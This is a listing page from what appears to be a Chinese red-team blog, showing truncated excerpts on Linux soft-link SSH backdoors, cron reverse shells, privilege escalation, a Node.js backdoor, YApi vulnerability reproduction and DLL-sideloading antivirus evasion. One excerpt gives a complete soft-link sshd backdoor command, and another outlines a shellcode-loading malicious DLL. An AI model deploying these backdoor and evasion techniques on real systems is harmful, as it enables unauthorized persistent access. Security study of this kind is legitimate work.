• Linux软连接ssh后门之我见

    0x00 前言 学习了Sevck发表Linux软连接后门的《一条命令引发的思考》,还是存在几个疑惑点,仔细探究之后就有了这篇文章 0x01简单回顾 一、Linux经典软连接后门命令…

    2021年10月20日
  • ssh 软连接后门使用

    通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 说明:建立软连接到/u…

    2021年10月20日
  • 暗月红队考核靶场ack123下载

    暗月红队考核靶场ack123下载 简介 1.主要考点 1.站库分离外网打点2.过360全家桶3.过windwos defender4.过火绒5.内网漫游6.多层网络渗透7.横向渗透…

    2021年10月9日
  • 利用配置不当提权

    利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强) 一般情况下面 普通用户对程序是没有控制权的 然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知…

    红队技术 2021年9月18日
  • Ubuntu计划任务反弹shell

    1.介绍 在实际环境中,需要经常用到反弹shell,因为有的环境使用反弹shell会导致系统卡,导致网站不能访问,所以在打点拿到服务器权限时,需要再次反弹shell,这个时候可以用…

    2021年9月12日
  • YApi 接口管理平台 漏洞复现

    YApi 接口管理平台 漏洞复现 1.漏洞描述 YAPI接口管理平台是国内某旅行网站的开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采…

    2021年9月11日
  • node js 后门

    node app.js http://192.168.0.187:8000/?command=netstat%20-an

    2021年9月11日
  • kali 2021 安装jdk

    中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://…

    2021年9月6日
  • kali 2021 更新 源

    中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://…

    渗透测试 2021年9月6日
  • 白加黑源码免杀学习

    概述 白程序:WeChat.exe 恶意dll:wechatwin.dll 制作流程 获取导出函数列表 shellcode写入内存加载 DllMain执行jmp_shellcode

    红队技术 2021年9月6日
  • 点击查看更多

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息